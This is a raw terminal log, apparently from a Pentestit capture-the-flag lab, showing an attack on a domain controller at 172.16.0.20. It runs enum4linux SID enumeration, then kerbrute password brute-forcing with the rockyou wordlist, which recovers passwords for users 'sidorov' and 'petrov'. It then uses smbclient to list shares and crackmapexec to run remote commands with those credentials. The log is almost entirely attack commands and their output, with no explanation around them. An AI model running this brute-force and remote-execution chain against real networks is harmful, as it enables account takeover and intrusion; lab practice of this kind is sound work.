S-1-5-32-500 *unknown*\*unknown* (8)
S-1-5-32-501 *unknown*\*unknown* (8)
S-1-5-32-502 *unknown*\*unknown* (8)
S-1-5-32-503 *unknown*\*unknown* (8)
S-1-5-32-504 *unknown*\*unknown* (8)
S-1-5-32-505 *unknown*\*unknown* (8)
S-1-5-32-506 *unknown*\*unknown* (8)
S-1-5-32-507 *unknown*\*unknown* (8)
S-1-5-32-508 *unknown*\*unknown* (8)
S-1-5-32-509 *unknown*\*unknown* (8)
S-1-5-32-510 *unknown*\*unknown* (8)
S-1-5-32-511 *unknown*\*unknown* (8)
S-1-5-32-512 *unknown*\*unknown* (8)
S-1-5-32-513 *unknown*\*unknown* (8)
S-1-5-32-514 *unknown*\*unknown* (8)
S-1-5-32-515 *unknown*\*unknown* (8)
S-1-5-32-516 *unknown*\*unknown* (8)
S-1-5-32-517 *unknown*\*unknown* (8)
S-1-5-32-518 *unknown*\*unknown* (8)
S-1-5-32-519 *unknown*\*unknown* (8)
S-1-5-32-520 *unknown*\*unknown* (8)
S-1-5-32-521 *unknown*\*unknown* (8)
S-1-5-32-522 *unknown*\*unknown* (8)
S-1-5-32-523 *unknown*\*unknown* (8)
S-1-5-32-524 *unknown*\*unknown* (8)
S-1-5-32-525 *unknown*\*unknown* (8)
S-1-5-32-526 *unknown*\*unknown* (8)
S-1-5-32-527 *unknown*\*unknown* (8)
S-1-5-32-528 *unknown*\*unknown* (8)
S-1-5-32-529 *unknown*\*unknown* (8)
S-1-5-32-530 *unknown*\*unknown* (8)
S-1-5-32-531 *unknown*\*unknown* (8)
S-1-5-32-532 *unknown*\*unknown* (8)
S-1-5-32-533 *unknown*\*unknown* (8)
S-1-5-32-534 *unknown*\*unknown* (8)
S-1-5-32-535 *unknown*\*unknown* (8)
S-1-5-32-536 *unknown*\*unknown* (8)
S-1-5-32-537 *unknown*\*unknown* (8)
S-1-5-32-538 *unknown*\*unknown* (8)
S-1-5-32-539 *unknown*\*unknown* (8)
S-1-5-32-540 *unknown*\*unknown* (8)
S-1-5-32-541 *unknown*\*unknown* (8)
S-1-5-32-542 *unknown*\*unknown* (8)
S-1-5-32-543 *unknown*\*unknown* (8)
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 *unknown*\*unknown* (8)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)
S-1-5-32-1000 *unknown*\*unknown* (8)
S-1-5-32-1001 *unknown*\*unknown* (8)
S-1-5-32-1002 *unknown*\*unknown* (8)
S-1-5-32-1003 *unknown*\*unknown* (8)
S-1-5-32-1004 *unknown*\*unknown* (8)
S-1-5-32-1005 *unknown*\*unknown* (8)
S-1-5-32-1006 *unknown*\*unknown* (8)
S-1-5-32-1007 *unknown*\*unknown* (8)
S-1-5-32-1008 *unknown*\*unknown* (8)
S-1-5-32-1009 *unknown*\*unknown* (8)
S-1-5-32-1010 *unknown*\*unknown* (8)
S-1-5-32-1011 *unknown*\*unknown* (8)
S-1-5-32-1012 *unknown*\*unknown* (8)
S-1-5-32-1013 *unknown*\*unknown* (8)
S-1-5-32-1014 *unknown*\*unknown* (8)
S-1-5-32-1015 *unknown*\*unknown* (8)
S-1-5-32-1016 *unknown*\*unknown* (8)
S-1-5-32-1017 *unknown*\*unknown* (8)
S-1-5-32-1018 *unknown*\*unknown* (8)
S-1-5-32-1019 *unknown*\*unknown* (8)
S-1-5-32-1020 *unknown*\*unknown* (8)
S-1-5-32-1021 *unknown*\*unknown* (8)
S-1-5-32-1022 *unknown*\*unknown* (8)
S-1-5-32-1023 *unknown*\*unknown* (8)
S-1-5-32-1024 *unknown*\*unknown* (8)
S-1-5-32-1025 *unknown*\*unknown* (8)
S-1-5-32-1026 *unknown*\*unknown* (8)
S-1-5-32-1027 *unknown*\*unknown* (8)
S-1-5-32-1028 *unknown*\*unknown* (8)
S-1-5-32-1029 *unknown*\*unknown* (8)
S-1-5-32-1030 *unknown*\*unknown* (8)
S-1-5-32-1031 *unknown*\*unknown* (8)
S-1-5-32-1032 *unknown*\*unknown* (8)
S-1-5-32-1033 *unknown*\*unknown* (8)
S-1-5-32-1034 *unknown*\*unknown* (8)
S-1-5-32-1035 *unknown*\*unknown* (8)
S-1-5-32-1036 *unknown*\*unknown* (8)
S-1-5-32-1037 *unknown*\*unknown* (8)
S-1-5-32-1038 *unknown*\*unknown* (8)
S-1-5-32-1039 *unknown*\*unknown* (8)
S-1-5-32-1040 *unknown*\*unknown* (8)
S-1-5-32-1041 *unknown*\*unknown* (8)
S-1-5-32-1042 *unknown*\*unknown* (8)
S-1-5-32-1043 *unknown*\*unknown* (8)
S-1-5-32-1044 *unknown*\*unknown* (8)
S-1-5-32-1045 *unknown*\*unknown* (8)
S-1-5-32-1046 *unknown*\*unknown* (8)
S-1-5-32-1047 *unknown*\*unknown* (8)
S-1-5-32-1048 *unknown*\*unknown* (8)
S-1-5-32-1049 *unknown*\*unknown* (8)
S-1-5-32-1050 *unknown*\*unknown* (8)
============================================
| Getting printer info for 172.16.0.20 |
============================================
No printers returned.
enum4linux complete on Thu Feb 13 16:35:40 2020
root@kali ~/ctf/pentestitlab14
root@kali /opt/kerbrute/dist master v1.0.3 ./kerbrute_linux_amd64 bruteuser --dc 172.16.0.20 -d test.lab /usr/share/wordlists/rockyou.txt sidorov -t 200 1 ↵ ⚡ 3612 18:40:36
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: dev (9dad6e1) - 02/13/20 - Ronnie Flathers @ropnop
2020/02/13 18:40:52 > Using KDC(s):
2020/02/13 18:40:52 >
172.16.0.20:88
2020/02/13 18:41:23 > [+] VALID LOGIN:
sidorov@test.lab:1234qwer
2020/02/13 18:41:26 > Done! Tested 3277 logins (1 successes) in 34.014 seconds
root@kali /opt/kerbrute/dist master v1.0.3
root@kali ~/ctf/pentestitlab14/vpn2 smbclient -L 172.16.0.20 -U 'sidorov@test.lab' -p 1234qwer
Enter sidorov@test.lab's password:
Sharename Type Comment
--------- ---- -------
netlogon Disk
sysvol Disk
IPC$ IPC IPC Service (Samba 4.5.16-Debian)
SMB1 disabled -- no workgroup available
root@kali ~/ctf/pentestitlab14/vpn2
root@kali ~/ctf/pentestitlab14 crackmapexec smb 172.16.0.20 -u 'sidorov@test.lab' -p 1234qwer -x whoami
SMB 172.16.0.20 445 DC2 [*] Windows 6.1 (name:DC2) (domain:TEST) (signing:True) (SMBv1:True)
SMB 172.16.0.20 445 DC2 [+] TEST\sidorov@test.lab:1234qwer
root@kali ~/ctf/pentestitlab14
root@kali /opt/kerbrute/dist master v1.0.3 ./kerbrute_linux_amd64 bruteuser --dc 172.16.0.20 -d test.lab /usr/share/wordlists/rockyou.txt petrov -t 200 ✔ ⚡ 3676 19:10:47
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: dev (9dad6e1) - 02/13/20 - Ronnie Flathers @ropnop
2020/02/13 19:10:56 > Using KDC(s):
2020/02/13 19:10:56 >
172.16.0.20:88
2020/02/13 19:12:16 > [+] VALID LOGIN:
petrov@test.lab:P@ssw0rd
2020/02/13 19:12:20 > Done! Tested 8182 logins (1 successes) in 83.873 seconds
root@kali /opt/kerbrute/dist master v1.0.3
root@kali ~/ctf/pentestitlab14 smbclient -L 172.16.0.20 -U 'petrov@test.lab' ✔ ⚡ 3747 19:18:44
Enter petrov@test.lab's password:
Sharename Type Comment
--------- ---- -------
netlogon Disk
sysvol Disk
IPC$ IPC IPC Service (Samba 4.5.16-Debian)
SMB1 disabled -- no workgroup available
root@kali ~/ctf/pentestitlab14 cme smb 172.16.0.20 -u 'petrov@test.lab' -p 'P@ssw0rd' -x whoami ✔ ⚡ 3748 19:20:36
CME 172.16.0.20:445 DC2 [*] Windows 6.1 Build 0 (name:DC2) (domain:TEST)
CME 172.16.0.20:445 DC2 [+] TEST\petrov@test.lab:P@ssw0rd
[*] KTHXBYE!
root@kali ~/ctf/pentestitlab14